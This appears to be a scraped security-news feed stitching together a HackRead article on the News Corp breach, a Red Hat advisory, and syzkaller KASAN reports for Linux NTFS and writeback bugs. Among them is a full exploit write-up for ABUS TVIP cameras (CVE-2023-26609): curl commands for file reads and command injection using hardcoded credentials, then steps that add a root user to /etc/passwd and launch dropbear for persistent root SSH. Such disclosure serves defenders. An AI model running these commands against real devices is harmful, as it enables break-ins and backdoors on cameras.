By Waqas
Rupert Murdoch's News Corp revealed a data breach in 2022, but it turns out that hackers had been in the media giant's network two years prior.
This is a post from HackRead.com Read the original post: News Corp: Hackers sat undetected on its network for 2 years

News Corp previously blamed hackers linked to China for the cyber attack, with the intention of gathering intelligence to benefit China’s interests.

In February 2022, News Corp, the giant media and publishing company, disclosed a data breach revealing that its journalists had been targeted in a software supply chain attack.

Now, the company has shared additional information stating that the breach actually occurred in February 2020, meaning hackers sat on its network for two years without being noticed. The cybersecurity firm to assist News Corp at that time was Google-owned Mandiant.

In a breach notification, the company said that the threat actors behind the breach accessed its email and document storage system, used by multiple News Corp businesses. Personal and health information of affected employees was accessed, but the company stated that it does not appear that the activity was focused on exploiting personal information.

> Based on the investigation, News Corp understands that, between February 2020 and January 2022, an unauthorized party gained access to certain business documents and emails from a limited number of its personnel’s accounts in the affected system, some of which contained personal information.
> 
> News Corp

The breach impacted a number of News Corp news outlets, including The Wall Street Journal, the New York Post and its U.K. news operations. Among the personal information accessed were names, dates of birth, social security numbers, driver’s license numbers, passport numbers, financial account information and medical and health insurance information.

News Corp has previously stated that the attackers were linked to China and were likely involved in espionage activities to collect intelligence to benefit China’s interests.

In October 2022, the New York Post revealed that it had been hacked after its website and Twitter account were used to publish offensive content targeting multiple U.S. politicians. The newspaper later revealed that the incident was caused by one of its own employees who was fired after their involvement was discovered.

News Corp’s properties include a number of high-profile news outlets such as Dow Jones, FOX News, The Sun, and MarketWatch, among others. It is worth noting that in March 2019, the Dow Jones made headlines for leaking a “screening list” comprising sensitive information about terrorists, criminals, and shady businesses.

In April 2022, FOX News exposed thirteen million records online. The fifty-eight gigabytes worth of information included internal records, PII (personally identifiable information) of the company’s employees, and much more. These records remained open to public access before the company was alerted about the incident.

In a comment to Hackread.com, Julia O’Toole, CEO of MyCena Security Solutions, said that “It is astounding that News Corp has only discovered this highly important piece of information one year after the breach was first announced, and it puts employees at a much greater risk of financial fraud and identity theft._”_

Julia stressed that “Given that the attackers had two years of access before they were identified, this means they most likely got away with more information than was first realised, and with no one knowing it was stolen, they wouldn’t have been on high alert for potential attacks.”

“The suspected groups behind cyber espionage campaigns will generally always use phishing to gain an initial foothold on an organisation. Knowing it provides the greatest chance of success, they will target employees with realistic phishing emails in a bid to steal their user credentials so they can access the corporate network, carry out reconnaissance, and steal data,” warned Julia.

1.  Iran’s Fars News Agency website hacked
2.  Media Giant Guardian Hit By Ransomware Attack
3.  Anonymous Hacks Russian Media Censoring Agency
4.  Windows, Linux and macOS Hit by Chinese APT Group
5.  APT41 hackers spying on texts with MessageTap Malware

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

News Corp: Hackers sat undetected on its network for 2 years

ABUS TVIP 20000-21150 devices allows remote attackers to execute arbitrary code via shell metacharacters in the /cgi-bin/mft/wireless_mft ap field.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Exploit Title: ABUS Security Camera LFI, RCE and SSH Root Access # Date: 2023-02-16 # Exploit Author: d1g@segfault.net for NetworkSEC \[NWSSA-001-2023\] # Vendor Homepage: https://www.abus.com # Version/Model: TVIP 20000-21150 (probably many others) # Tested on: GM ARM Linux 2.6, Server: Boa/0.94.14rc21 # CVE: Currently Unassigned (CVE-2023-XXXXX) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++ 0x00 DESCRIPTION ++++++++++++++++++++ During a recent engagement, a network camera was discovered. Web fuzzing revealed a URL of /device containing output about running processes as well as a pretty complete listing of webcontent which inevitably arose our suspicion. More research revealed that files w/ known LFI and RCE issues were present, leading to either arbitrary file reads or remote code execution, both w/ root privileges and using known default credentials (either admin:admin or manufacture:erutcafunam). After closer filesystem inspection, RCE led to a remote root SSH shell. +++++++++++++++ 0x01 IMPACT +++++++++++++++ The LFI vulnerability can be exploited using a URL of: /cgi-bin/admin/fileread?READ.filePath=\[filename\] and is able to read any file on the system. The RCE vulnerability originates from a command injection and may be exploited by calling a URL of: /cgi-bin/mft/wireless\_mft?ap=irrelevant;\[command\] (as classy as it can get, we can also use the pipe "|" instead, and linefeed a.k.a. "%0a" works as well) effectively giving us remote code (or rather command) execution. +++++++++++++++++++++++++++++++ 0x02 PROOF OF CONCEPT (PoC) +++++++++++++++++++++++++++++++ #!/bin/bash # # ABUS Security Camera LFI # curl -iv "http://admin:admin@a.b.c.d/cgi-bin/admin/fileread?READ.filePath=/$1" The script can be called like: ./LFI.sh /etc/passwd to display the contents of the passwd file. When reading the configuration of the BOA server (/etc/boa.conf), we find hardcoded credentials: # MFT: Specify manufacture commands user name and password MFT manufacture erutcafunam These can now be used to execute the RCE (based on command injection): #!/bin/bash # # ABUS Security Camera RCE # curl -iv "http://manufacture:erutcafunam@a.b.c.d/cgi-bin/mft/wireless\_mft?ap=testname;$1" and can be called like: ./LFI.sh id to display a user id of uid=0(root) gid=0(root) +++++++++++++++++++++++++++++++ 0x03 SSH Remote Root Access +++++++++++++++++++++++++++++++ After having discovered the previously described vulnerabilities, multiple attempts to spawn a nice reverse shell failed as the system was minimal and did neither offer binaries like bash or netcat, nor any compilers or scripting language interpreters to execute our code. Furthermore, binaries that we transferred onto the system (for ARM little-endian architecture) either resulted in "Segmentation fault" (mfsvenom) or as we saw later "Illegal instruction" (netcat for ARM). We had to inspect the local attack surface and use the LOLBIN approach, a.k.a. living off the land binaries available on the system. In this case, the minimal and often busybox-included dropbear SSH daemon became pretty handy. To successfully implement a remote root SSH shell for persistance, several steps had to be undertaken: 1) First, we had to create a valid SSH keyset by reusing our RCE.sh skript: ./RCE.sh "/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear\_rsa\_host\_key" 2) Then, add our user to the password file, e.g.: ./RCE.sh "echo%20d1g:OmE2EUpLJafIk:0:0:root:/:/bin/sh%20>>%20/etc/passwd" 3) Finally, start the server: ./RCE.sh "/etc/dropbear/dropbear%20-E%20-F" We can now SSH (using obsolete and insecure algorithms for both KeyExchange and HostKey) into our rootshell: sshpass -p XXXXXXX ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa d1g@x.x.x.x Welcome to \_\_\_\_\_ \_\_ \_\_\_ \_\_ \_\_\_ \_ \_ \_ | \_\_\_| / \\ / \_\_ \\ / \\ | \_ \\ / \\ \\ \\ / / | |\_\_\_ / /\\ \\ | /\_\_\\ \\ / /\\ \\ | | \\ | / /\\ \\ \\ V / | \_\_\_|| |\_\_| | | \_ / | |\_\_| | | | | | | |\_\_| | \\ / | | | \_\_ | | | \\ \\ | \_\_ | | |\_/ / | \_\_ | | | |\_| |\_| |\_| |\_| \\\_\\|\_| |\_| |\_\_\_ / |\_| |\_| |\_| For further information check: http://www.GM.com/ BusyBox v1.1.3 (2012.07.16-03:58+0000) Built-in shell (ash) Enter 'help' for a list of built-in commands. \[d1g\]# id uid=0(root) gid=0(root) --- #EOF

CVE-2023-26609

An update for service-binding-operator-bundle-container and service-binding-operator-container is now available for OpenShift Developer Tools and Services for OCP 4.9.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-41717: A flaw was found in the net/http library of the golang package. This flaw allows an attacker to cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2023-02-27

Updated:

2023-02-27

**RHSA-2023:0918 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: Service Binding Operator security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

An update for service-binding-operator-bundle-container and service-binding-operator-container is now available for OpenShift Developer Tools and Services for OCP 4.9.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Service Binding manages the data plane for applications and backing services.  

Security Fix(es):  

*   golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   OpenShift Developer Tools and Services 4.9 x86\_64
*   OpenShift Developer Tools and Services 4.9 s390x
*   OpenShift Developer Tools and Services 4.9 ppc64le
*   OpenShift Developer Tools and Services 4.9 aarch64

**Fixes**

*   BZ - 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests
*   APPSVC-1204 - Provisioned Service discovery
*   APPSVC-1256 - CVE-2022-41717

**CVEs**

*   CVE-2021-46848
*   CVE-2022-1304
*   CVE-2022-22624
*   CVE-2022-22628
*   CVE-2022-22629
*   CVE-2022-22662
*   CVE-2022-26700
*   CVE-2022-26709
*   CVE-2022-26710
*   CVE-2022-26716
*   CVE-2022-26717
*   CVE-2022-26719
*   CVE-2022-30293
*   CVE-2022-35737
*   CVE-2022-40303
*   CVE-2022-40304
*   CVE-2022-41717
*   CVE-2022-42898
*   CVE-2022-47629

**OpenShift Developer Tools and Services 4.9**

SRPM

x86\_64

s390x

ppc64le

aarch64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2023:0918: Red Hat Security Advisory: Service Binding Operator security update

In the Linux kernel 6.0.8, there is a use-after-free in ntfs_trim_fs in fs/ntfs3/bitmap.c.

Hello,  
I found the following issue using syzkaller on:  
HEAD commit : e60276b8c11ab4a8be23807bc67b04  
8cfb937dfa (v6.0.8)  
git tree: stable

C Reproducer : https://gist.github.com/oswalpalash/113c274067bc9c4c653a6dd09fb2e456  
Kernel .config :  
https://gist.github.com/oswalpalash/0962c70d774e5ec736a047bba917cecb

Console log :

\==================================================================  
BUG: KASAN: use-after-free in ntfs\_trim\_fs+0x84e/0x960  
Read of size 2 at addr ffff888104fea640 by task syz-executor.0/8081

CPU: 1 PID: 8081 Comm: syz-executor.0 Not tainted 6.0.8-pasta #2  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
1.13.0-1ubuntu1.1 04/01/2014  
Call Trace:  
<TASK>  
dump\_stack\_lvl+0xcd/0x134  
print\_report.cold+0xe5/0x63a  
kasan\_report+0x8a/0x1b0  
ntfs\_trim\_fs+0x84e/0x960  
ntfs\_ioctl\_fitrim+0x23e/0x340  
ntfs\_ioctl+0x9c/0xd0  
\_\_x64\_sys\_ioctl+0x193/0x200  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x7fac7f88eacd  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fac805f9bf8 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 00007fac7f9bbf80 RCX: 00007fac7f88eacd  
RDX: 0000000020000040 RSI: 00000000c0185879 RDI: 0000000000000003  
RBP: 00007fac7f8fcb05 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000  
R13: 00007ffcb363e05f R14: 00007ffcb363e200 R15: 00007fac805f9d80  
</TASK>

Allocated by task 8074:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_kmalloc+0xa6/0xd0  
\_\_kmalloc+0x349/0xd40  
tomoyo\_encode2.part.0+0xec/0x3b0  
tomoyo\_encode+0x28/0x50  
tomoyo\_realpath\_from\_path+0x186/0x620  
tomoyo\_path\_perm+0x219/0x420  
security\_inode\_getattr+0xcf/0x140  
vfs\_getattr+0x22/0x60  
vfs\_fstat+0x49/0x90  
\_\_do\_sys\_newfstat+0x81/0x100  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Freed by task 8074:  
kasan\_save\_stack+0x1e/0x40  
kasan\_set\_track+0x21/0x30  
kasan\_set\_free\_info+0x20/0x30  
\_\_kasan\_slab\_free+0xf5/0x180  
kfree+0x15e/0x540  
tomoyo\_path\_perm+0x240/0x420  
security\_inode\_getattr+0xcf/0x140  
vfs\_getattr+0x22/0x60  
vfs\_fstat+0x49/0x90  
\_\_do\_sys\_newfstat+0x81/0x100  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

The buggy address belongs to the object at ffff888104fea640  
which belongs to the cache kmalloc-32 of size 32  
The buggy address is located 0 bytes inside of  
32-byte region \[ffff888104fea640, ffff888104fea660)

The buggy address belongs to the physical page:  
page:ffffea000413fa80 refcount:1 mapcount:0 mapping:0000000000000000  
index:0xffff888104feafc1 pfn:0x104fea  
flags: 0x57ff00000000200(slab|node=1|zone=2|lastcpupid=0x7ff)  
raw: 057ff00000000200 ffffea00043f1b88 ffffea000414bec8 ffff888011840100  
raw: ffff888104feafc1 ffff888104fea000 000000010000003d 0000000000000000  
page dumped because: kasan: bad access detected  
page\_owner tracks the page as allocated  
page last allocated via order 0, migratetype Unmovable, gfp\_mask  
0x2420c0(\_\_GFP\_IO|\_\_GFP\_FS|\_\_GFP\_NOWARN|\_\_GFP\_COMP|\_\_GFP\_THISNODE),  
pid 6509, tgid 6509 (syz-executor.3), ts 50269499850, free\_ts  
50269456139  
prep\_new\_page+0x2c6/0x350  
get\_page\_from\_freelist+0xae9/0x3a80  
\_\_alloc\_pages+0x321/0x710  
cache\_grow\_begin+0x75/0x360  
kmem\_cache\_alloc\_node\_trace+0xbe2/0xd40  
\_\_kmalloc\_node+0x38/0x60  
\_\_vmalloc\_node\_range+0x3d3/0x1320  
vzalloc+0x67/0x80  
alloc\_counters.isra.0+0x5d/0x6f0  
do\_ipt\_get\_ctl+0x5de/0x980  
nf\_getsockopt+0x72/0xd0  
ip\_getsockopt+0x164/0x1c0  
tcp\_getsockopt+0x86/0xd0  
\_\_sys\_getsockopt+0x216/0x690  
\_\_x64\_sys\_getsockopt+0xba/0x150  
do\_syscall\_64+0x35/0xb0  
page last free stack trace:  
free\_pcp\_prepare+0x5ab/0xd00  
free\_unref\_page+0x19/0x410  
\_\_vunmap+0x6ff/0xaa0  
\_\_vfree+0x3c/0xd0  
vfree+0x5a/0x90  
do\_ipt\_get\_ctl+0x7b2/0x980  
nf\_getsockopt+0x72/0xd0  
ip\_getsockopt+0x164/0x1c0  
tcp\_getsockopt+0x86/0xd0  
\_\_sys\_getsockopt+0x216/0x690  
\_\_x64\_sys\_getsockopt+0xba/0x150  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Memory state around the buggy address:  
ffff888104fea500: fa fb fb fb fc fc fc fc 02 fc fc fc fc fc fc fc  
ffff888104fea580: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
\>ffff888104fea600: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
^  
ffff888104fea680: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
ffff888104fea700: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
\==================================================================

CVE-2023-26606: LKML: Palash Oswal: KASAN: use-after-free Read in ntfs_trim_fs

In MPD before 0.23.8, as used on Automotive Grade Linux and other platforms, the PipeWire output plugin mishandles a Drain call in certain situations involving truncated files. Eventually there is an assertion failure in libmpdclient because libqtappfw passes in a NULL pointer.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2022-48363

In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.

Hello,  
I found the following issue using syzkaller on:  
HEAD commit : e60276b8c11ab4a8be23807bc67b04  
8cfb937dfa (v6.0.8)  
git tree: stable

C Reproducer : https://gist.github.com/oswalpalash/cb298c137f3dbfb95a609671a61103fb  
Kernel .config :  
https://gist.github.com/oswalpalash/0962c70d774e5ec736a047bba917cecb

I found a related discussion in the past about a similar bug here :  
https://groups.google.com/g/syzkaller-bugs/c/BFLa1ZwXyG0/m/UIh6Pl2GBAAJ

Console log :

loop3: detected capacity change from 0 to 4096  
\==================================================================  
BUG: KASAN: slab-out-of-bounds in ntfs\_attr\_find+0xb87/0xce0  
Read of size 2 at addr ffff888106fc30ab by task syz-executor.3/11599

CPU: 0 PID: 11599 Comm: syz-executor.3 Not tainted 6.0.8-pasta #2  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
1.13.0-1ubuntu1.1 04/01/2014  
Call Trace:  
<TASK>  
dump\_stack\_lvl+0xcd/0x134  
print\_report.cold+0xe5/0x63a  
kasan\_report+0x8a/0x1b0  
ntfs\_attr\_find+0xb87/0xce0  
ntfs\_attr\_lookup+0x1051/0x2040  
ntfs\_read\_locked\_inode+0xb0c/0x5ab0  
ntfs\_iget+0x12d/0x180  
ntfs\_fill\_super+0x1ed0/0x8590  
mount\_bdev+0x34d/0x410  
legacy\_get\_tree+0x105/0x220  
vfs\_get\_tree+0x89/0x2f0  
path\_mount+0x121b/0x1cb0  
do\_mount+0xf3/0x110  
\_\_x64\_sys\_mount+0x18f/0x230  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x7f0e85e9146e  
Code: 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f  
84 00 00 00 00 00 90 f3 0f 1e fa 49 89 ca b8 a5 00 00 00 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007f0e849fda08 EFLAGS: 00000206 ORIG\_RAX: 00000000000000a5  
RAX: ffffffffffffffda RBX: 0000000020000200 RCX: 00007f0e85e9146e  
RDX: 0000000020000000 RSI: 0000000020000100 RDI: 00007f0e849fda60  
RBP: 00007f0e849fdaa0 R08: 00007f0e849fdaa0 R09: 0000000020000000  
R10: 0000000000000000 R11: 0000000000000206 R12: 0000000020000000  
R13: 0000000020000100 R14: 00007f0e849fda60 R15: 0000000020000040  
</TASK>

Allocated by task 1:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_slab\_alloc+0x85/0xb0  
kmem\_cache\_alloc+0x204/0xcc0  
\_\_kernfs\_new\_node+0xd4/0x8b0  
kernfs\_new\_node+0x93/0x120  
\_\_kernfs\_create\_file+0x51/0x350  
sysfs\_add\_file\_mode\_ns+0x20f/0x3f0  
internal\_create\_group+0x314/0xba0  
internal\_create\_groups.part.0+0x90/0x140  
sysfs\_create\_groups+0x25/0x50  
kobject\_add\_internal+0x318/0x8f0  
kobject\_init\_and\_add+0x101/0x160  
netdev\_queue\_update\_kobjects+0x1fe/0x4e0  
netdev\_register\_kobject+0x333/0x400  
register\_netdevice+0xbe9/0x1390  
bond\_create+0xb4/0x120  
bonding\_init+0x9f/0x114  
do\_one\_initcall+0xfe/0x650  
kernel\_init\_freeable+0x6c3/0x74c  
kernel\_init+0x1a/0x1d0  
ret\_from\_fork+0x1f/0x30

The buggy address belongs to the object at ffff888106fc3000  
which belongs to the cache kernfs\_node\_cache of size 168  
The buggy address is located 3 bytes to the right of  
168-byte region \[ffff888106fc3000, ffff888106fc30a8)

The buggy address belongs to the physical page:  
page:ffffea00041bf0c0 refcount:1 mapcount:0 mapping:0000000000000000  
index:0x0 pfn:0x106fc3  
flags: 0x57ff00000000200(slab|node=1|zone=2|lastcpupid=0x7ff)  
raw: 057ff00000000200 ffffea00041bc848 ffffea00041a9fc8 ffff88810006f200  
raw: 0000000000000000 ffff888106fc3000 0000000100000011 0000000000000000  
page dumped because: kasan: bad access detected  
page\_owner tracks the page as allocated  
page last allocated via order 0, migratetype Unmovable, gfp\_mask  
0x2420c0(\_\_GFP\_IO|\_\_GFP\_FS|\_\_GFP\_NOWARN|\_\_GFP\_COMP|\_\_GFP\_THISNODE),  
pid 1, tgid 1 (swapper/0), ts 8385653965, free\_ts 0  
prep\_new\_page+0x2c6/0x350  
get\_page\_from\_freelist+0xae9/0x3a80  
\_\_alloc\_pages+0x321/0x710  
cache\_grow\_begin+0x75/0x360  
kmem\_cache\_alloc+0xb69/0xcc0  
\_\_kernfs\_new\_node+0xd4/0x8b0  
kernfs\_new\_node+0x93/0x120  
kernfs\_create\_dir\_ns+0x48/0x150  
sysfs\_create\_dir\_ns+0x127/0x290  
kobject\_add\_internal+0x2c9/0x8f0  
kobject\_init\_and\_add+0x101/0x160  
net\_rx\_queue\_update\_kobjects+0x264/0x510  
netdev\_register\_kobject+0x278/0x400  
register\_netdevice+0xbe9/0x1390  
bond\_create+0xb4/0x120  
bonding\_init+0x9f/0x114  
page\_owner free stack trace missing

Memory state around the buggy address:  
ffff888106fc2f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
ffff888106fc3000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
\>ffff888106fc3080: 00 00 00 00 00 fc fc fc fc fc fc fc fc 00 00 00  
^  
ffff888106fc3100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
ffff888106fc3180: 00 00 fc fc fc fc fc fc fc fc 00 00 00 00 00 00  
\==================================================================

CVE-2023-26607: LKML: Palash Oswal: KASAN: slab-out-of-bounds Read in ntfs_attr_find

In the Linux kernel 6.0.8, there is a use-after-free in inode_cgwb_move_to_attached in fs/fs-writeback.c, related to __list_del_entry_valid.

Hello,  
I found the following issue using syzkaller on:  
HEAD commit : e60276b8c11ab4a8be23807bc67b04  
8cfb937dfa (v6.0.8)  
git tree: stable

C Reproducer : https://gist.github.com/oswalpalash/bed0eba75def3cdd34a285428e9bcdc4  
Kernel .config :  
https://gist.github.com/oswalpalash/0962c70d774e5ec736a047bba917cecb

Console log :

\==================================================================  
BUG: KASAN: use-after-free in \_\_list\_del\_entry\_valid+0xf2/0x110  
Read of size 8 at addr ffff8880273c4358 by task syz-executor.1/6475

CPU: 0 PID: 6475 Comm: syz-executor.1 Not tainted 6.0.8-pasta #2  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
1.13.0-1ubuntu1.1 04/01/2014  
Call Trace:  
<TASK>  
dump\_stack\_lvl+0xcd/0x134  
print\_report.cold+0xe5/0x63a  
kasan\_report+0x8a/0x1b0  
\_\_list\_del\_entry\_valid+0xf2/0x110  
inode\_cgwb\_move\_to\_attached+0x2ee/0x4e0  
writeback\_single\_inode+0x3fa/0x510  
write\_inode\_now+0x16a/0x1e0  
blkdev\_flush\_mapping+0x168/0x220  
blkdev\_put\_whole+0xd1/0xf0  
blkdev\_put+0x29b/0x700  
deactivate\_locked\_super+0x8c/0xf0  
deactivate\_super+0xad/0xd0  
cleanup\_mnt+0x347/0x4b0  
task\_work\_run+0xe0/0x1a0  
exit\_to\_user\_mode\_prepare+0x25d/0x270  
syscall\_exit\_to\_user\_mode+0x19/0x50  
do\_syscall\_64+0x42/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x7f22bd29143b  
Code: ff ff ff f7 d8 64 89 01 48 83 c8 ff c3 66 90 f3 0f 1e fa 31 f6  
e9 05 00 00 00 0f 1f 44 00 00 f3 0f 1e fa b8 a6 00 00 00 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007ffe505103b8 EFLAGS: 00000246 ORIG\_RAX: 00000000000000a6  
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007f22bd29143b  
RDX: 00007f22bd228a90 RSI: 000000000000000a RDI: 00007ffe50510480  
RBP: 00007ffe50510480 R08: 00007f22bd2fba1f R09: 00007ffe50510240  
R10: 00000000fffffffb R11: 0000000000000246 R12: 00007f22bd2fb9f8  
R13: 00007ffe50511520 R14: 0000555556f4bd90 R15: 0000000000000032  
</TASK>

Allocated by task 7810:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_slab\_alloc+0x85/0xb0  
kmem\_cache\_alloc\_lru+0x25b/0xfb0  
fat\_alloc\_inode+0x23/0x1e0  
alloc\_inode+0x61/0x1e0  
new\_inode\_pseudo+0x13/0x80  
new\_inode+0x1b/0x40  
fat\_build\_inode+0x146/0x2d0  
vfat\_create+0x249/0x390  
lookup\_open+0x10bc/0x1640  
path\_openat+0xa42/0x2840  
do\_filp\_open+0x1ca/0x2a0  
do\_sys\_openat2+0x61b/0x990  
do\_sys\_open+0xc3/0x140  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Freed by task 16:  
kasan\_save\_stack+0x1e/0x40  
kasan\_set\_track+0x21/0x30  
kasan\_set\_free\_info+0x20/0x30  
\_\_kasan\_slab\_free+0xf5/0x180  
kmem\_cache\_free.part.0+0xfc/0x4a0  
i\_callback+0x3f/0x70  
rcu\_core+0x785/0x1720  
\_\_do\_softirq+0x1d0/0x908

Last potentially related work creation:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_record\_aux\_stack+0x7e/0x90  
call\_rcu+0x99/0x740  
destroy\_inode+0x129/0x1b0  
iput.part.0+0x5cd/0x800  
iput+0x58/0x70  
dentry\_unlink\_inode+0x2e2/0x4a0  
\_\_dentry\_kill+0x374/0x5e0  
dput+0x656/0xbe0  
\_\_fput+0x3cc/0xa90  
task\_work\_run+0xe0/0x1a0  
exit\_to\_user\_mode\_prepare+0x25d/0x270  
syscall\_exit\_to\_user\_mode+0x19/0x50  
do\_syscall\_64+0x42/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

The buggy address belongs to the object at ffff8880273c4080  
which belongs to the cache fat\_inode\_cache of size 1488  
The buggy address is located 728 bytes inside of  
1488-byte region \[ffff8880273c4080, ffff8880273c4650)

The buggy address belongs to the physical page:  
page:ffffea00009cf100 refcount:1 mapcount:0 mapping:0000000000000000  
index:0xffff8880273c4ffe pfn:0x273c4  
flags: 0xfff00000000200(slab|node=0|zone=1|lastcpupid=0x7ff)  
raw: 00fff00000000200 ffffea00009cf0c8 ffff88801820e450 ffff888103e00e00  
raw: ffff8880273c4ffe ffff8880273c4080 0000000100000002 0000000000000000  
page dumped because: kasan: bad access detected  
page\_owner tracks the page as allocated  
page last allocated via order 0, migratetype Reclaimable, gfp\_mask  
0x242050(\_\_GFP\_IO|\_\_GFP\_NOWARN|\_\_GFP\_COMP|\_\_GFP\_THISNODE|\_\_GFP\_RECLAIMABLE),  
pid 7810, tgid 7808 (syz-executor.1), ts 50543388569, free\_ts  
21285403579  
prep\_new\_page+0x2c6/0x350  
get\_page\_from\_freelist+0xae9/0x3a80  
\_\_alloc\_pages+0x321/0x710  
cache\_grow\_begin+0x75/0x360  
kmem\_cache\_alloc\_lru+0xe72/0xfb0  
fat\_alloc\_inode+0x23/0x1e0  
alloc\_inode+0x61/0x1e0  
new\_inode\_pseudo+0x13/0x80  
new\_inode+0x1b/0x40  
fat\_fill\_super+0x1c37/0x3710  
mount\_bdev+0x34d/0x410  
legacy\_get\_tree+0x105/0x220  
vfs\_get\_tree+0x89/0x2f0  
path\_mount+0x121b/0x1cb0  
do\_mount+0xf3/0x110  
\_\_x64\_sys\_mount+0x18f/0x230  
page last free stack trace:  
free\_pcp\_prepare+0x5ab/0xd00  
free\_unref\_page+0x19/0x410  
slab\_destroy+0x14/0x50  
slabs\_destroy+0x6a/0x90  
\_\_\_cache\_free+0x1e3/0x3b0  
qlist\_free\_all+0x51/0x1c0  
kasan\_quarantine\_reduce+0x13d/0x180  
\_\_kasan\_slab\_alloc+0x97/0xb0  
kmem\_cache\_alloc+0x204/0xcc0  
getname\_flags+0xd2/0x5b0  
vfs\_fstatat+0x73/0xb0  
